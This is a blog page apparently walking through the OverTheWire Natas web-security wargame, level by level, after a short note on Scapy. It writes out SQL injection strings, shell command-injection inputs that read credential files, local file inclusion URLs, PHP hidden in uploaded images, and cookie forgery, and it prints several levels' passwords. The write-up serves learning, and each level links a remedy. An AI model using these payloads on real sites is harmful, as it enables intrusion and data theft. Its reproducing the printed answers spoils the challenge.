Hello All,
Its been long time I have posted some stuffs in my blog. Since I involved in some network related penetration testing in recent times, I found python Scapy module is more handy. So i decided to write a small post about it. Once you get more familiar with this tool, it will make life easier to network admins/pen testers. It works perfectly on Linux platform once you install Scapy packages and I didn't tried working on windows because it requires some dependencies. Mainly scapy is used to create, manipulate and capture TCP/IP packets and LOT MORE. Always run scapy with root privileges. I planned to post about how to create packets, send those packets and replay those packets and some of security attacks (ARP flooding, TCP initial sequence number prediction, etc) can be performing using Scapy in upcoming posts. To read more about Scapy and its usages: visit this link
0 Comments
Let us see the source code to find what kind of vulnerability is this Source Code: <? Yeah your guess is right !!! It is SQL Injection Vulnerability.
First I tried 1' or '1'='1' # in username field and I got access denied error message ... After looking into the code once again I found that we need to use double quotes instead of single codes to execute our query. Then I tried 1" or "1"="1" # in username field and I got the password for next level . :) Successful login ! The password for natas15 is AwWj***cvxr****gZ9J5****kmxdk*** Vulnerability: https://www.owasp.org/index.php/SQL_Injection Remedy : http://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php We need to upload an image which is less than 1kb and it provides link to see that image after successful uploading.But this time they resolved remote file inclusion attack by adding some secure function. Let us see whether it is totally secured or not :) Click the view Source code link given in the main page Then You can notice the following code <? The difference between above code and previous level's code is checking the file signature (aka "Magic words" using exif_imagetype function.After reading about the file signature in following link. I understood little bit on signature of the files so to bypass this function i took image which is less than 1kb and I opened it in Notepad++ and added my PHP script at end of the file. <?php I added that echo line to differentiate our password from image data. I uploaded the file and followed the same process which I did in previous level to change the extension to PHP.
Now I got the hyper like of my PHP script, Then i visited that page and got the password for next level. <Existing file data>==================="Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 Natas14 : Lg**M10****PyVBk****mbllQ5L6**** We need to upload an image which is less than 1kb and it provides link to see that image after successful uploading. Solution : Click the view Source code link given in the main page Then You can notice the following code <?php In the above, it explains that makeRandomPathFromFilename function used to get the date of the and its extension and it uploads the file in /upload/ directory with some random name created by genRandomString function.And it provides the hyper link for the following file which h is uploaded right now. I created a small PHP code to display password from file /etc/natas_webpass/natas14 <?php And i uploaded following php file , while upload turn on tamper data add on in Firefox to change the extension of the file to .php in POST data. Because in POST data it used to send .jpg as default file extension.
Now you can see the password for the next level. Natas 13 : jmLTY0qi****aKc9341c****BJv7M*** Vulnerability: http://en.wikipedia.org/wiki/Remote_File_Inclusion Remedy: http://www.esecurityplanet.com/browser-security/how-to-prevent-remote-file-inclusion-rfi-attacks.html Solution: Check out the view Source code link given in the main page Then You can notice the following code <? loadData function is used to load and verify all the datas like showpassword and bgcolor using XOR Encrypt Function. saveData function is used to set the cookie value using XOR_ENCRYPT function . saveDatae functions uses two input to encrypt . One is $defaultdata and another one is Skey . $defaultData XOR Skey ==> $encrypted date (Cookie Vaule) So, Sencrypted data XOR $defaultData ==> Skey And i wrote the following code using this concept and got the key <?php Output (Key) :: qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq And another code to Retrieve the exact cookie value to get natas12 password. <?php Cookie value for the value password="yes" ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
And i changed the cookie value (Data) using cookie manager+ addon in firefox and i retrived the password for next level The password for natas12 is EDXp****6wLKHZy1****UZk0RKfL**** Natas 9: Solution: Check out the view Source code link given in the main page Then You can notice the following code <? Seeing passthru("grep -i $key dictionary.txt"); this line we can understand that without sanitation the command is executing . So this is code is vulnerable to Command Injection . So i tried some commands in the input field . For example : I tried ; cd /etc/; dir; in input field and I can see all the file names in /etc. So i concluded it that command injection works. So as main page says "All passwords are also stored in /etc/natas_webpass/" i tried executing cat command and retrived my next level password. Input string to get key is ; cat /etc/natas_webpass/natas9; Natas 10 : W0mMh****nG8dc****qvk3JA9lGt**** Vulnerability: Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or "inject") code into a computer program to change the course of execution. The results of a code injection attack can be disastrous. Remedy: http://stackoverflow.com/questions/1205889/how-to-prevent-code-injection-attacks-in-php Natas 10: Solution: Check out the view Source code link given in the main page Then You can notice the following code <? This time they filtered symbols like ; , |, $ using Preg_Match function ... But Still code or command injection vulnerability exists. So we need to find a way to access the file without these symbols..
After long searc in google i found some idea in grep command. so we extract whole data from the folder where we use grep. For example if we use grep .* /floder1/floder2/ then it reveals all data from the all files inside floder2 . so i gave input as .* /etc/natas_webpass/natas10 and i got the key :) natas11 : U82q****MQ9xuF****YX61s7OZD9**** Natas 8: Solution: Check out the view Source code link given in the main page Then You can notice the following code <? Seeing this code i wrote the following simple PHP code to get back the secret from $encodedSecret variable. <?php And i ran this code in http://writecodeonline.com/php4/ then I got Secret as oubWYf2kBq
And i submitted this secret and i got the key for next level The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl Natas 6:
Solution: First i navigated to see the sourcecode of that challenge. After seeing that "include "includes/secret.inc"; " in that PHP code. I tried to access the following link: "http://natas6.natas.labs.overthewire.org/includes/secret.inc" I found the secret text and typed in secret text box . And i got the credentials of next level in simple way :-) Result :: natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 Natas 7: Solution:After seeing hint in source page <!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 --> So i navigated to all pages in site and i found there is local file vulnerability. And i typed the following URL and got the Natas 8 credentials "http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8" Result:: natas8 password :: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe Vulnerability: Local File Inclusion Vulnerability Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected. To Prevent these kind of attacks check the following link: http://hakipedia.com/index.php/Local_File_Inclusion Natas 3
solution: After seeing the hint in source page.(<!-- No more information leaks!! Not even Google will find it this time... -->) Then started seeing robots.txt in same directory And i found the following line in that robots.txt page User-agent: * Disallow: /s3cr3t/ In that s3cr3t page i have found user.txt file.After opening that file i found next level username and password. natas4 : 8ywPLDUB2yY2ujFnwGUdWWp8MT4yZrqz Natas 4 solution: After seeing the Error message displayed in that page . I decided to to send this page request using referrer 'http://natas5.natas.labs.overthewire.org' in header . For that i used Tamper Data addon in firefox and changed the Referrer field in that header . After doing these steps i got credentials of next level. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq Natas 5 Solution: Error message throws saying that you have to log in to access this page. So i checked all the details of the page .And i noticed the cookie "loggedin" set as 0 And i changed that value into 1 and using Firefox Addon "Cookies Manager+ " And i refreshed that page and got credentials of next level. Natas 6 : aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 Vulnerability: Cookie Poisoning : Cookie Poisoning attacks involve the modification of the contents of a cookie (personal information stored in a Web user's computer) in order to bypass security mechanisms. Using cookie poisoning attacks, attackers can gain unauthorized information about another user and steal their identity. To prevent Cookie Poisoning follow this link: http://stackoverflow.com/questions/1633062/how-to-prevent-cookie-poisoning Natas0
Solution: Right click and see source code. Natas1 - gtVrDuiDfck831PqWsLEZy5gyDz1clto Natas1 solution: Disable javascript in your browser and then see source code. Natas2 - ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi Natas2 solution: See the source code of that page In that soruce code , you can notice the following line <img src="files/pixel.png"> And just tried http://natas2.natas.labs.overthewire.org/files/ in browser so i found Directory Listing Security Vulnerability in that link And i found users.txt file in that directory and i found natas3 password. natas3 - sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 Directory Listing Security Vulnerability: Description: The web server is configured to display the list of all files contained in this directory. This is not recommended because the directory may contain files that are not normally exposed through links on the web site. Impact: A user can view a list of all files from this directory possibly exposing sensitive information. To avoid Directory listing vulnerability: Check this Link to understand in detail. |
Details
Categories
All
Archives
June 2017
Vivek N
An idea can change your life :) |